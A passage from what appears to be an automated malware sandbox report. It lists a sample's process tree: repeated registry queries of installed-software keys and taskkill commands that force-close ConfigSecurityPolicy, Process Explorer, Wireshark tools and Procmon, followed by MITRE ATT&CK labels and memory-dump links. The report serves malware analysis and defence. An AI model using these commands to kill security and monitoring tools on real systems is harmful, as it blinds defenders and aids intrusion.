    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:4780
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:4776
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4728
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:4856
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:4876
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:4968
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:5044
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5000
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5072
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:3588
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:4184
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4176
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:4332
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:4324
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4400
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:4432
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:4560
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4580
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:4684
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:4668
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4804
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:4720
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:4900
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4876
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:4968
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    PID:5108
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4128
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:4104
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    PID:5024
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4184
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:4372
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:4424
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4536
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:4656
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:4684
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4796
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:4864
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:5052
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4968
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4204
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4712
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4920
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5000
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5024
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4900
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:756

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3892-84-0x000001AAA4CB0000-0x000001AAA4CB1000-memory.dmp

Filesize
4KB

Download
memory/3892-75-0x00007FFDC0E90000-0x00007FFDC187C000-memory.dmp

Filesize
9.9MB

Download
memory/3892-95-0x000001AAA4E60000-0x000001AAA4E61000-memory.dmp

Filesize
4KB

Download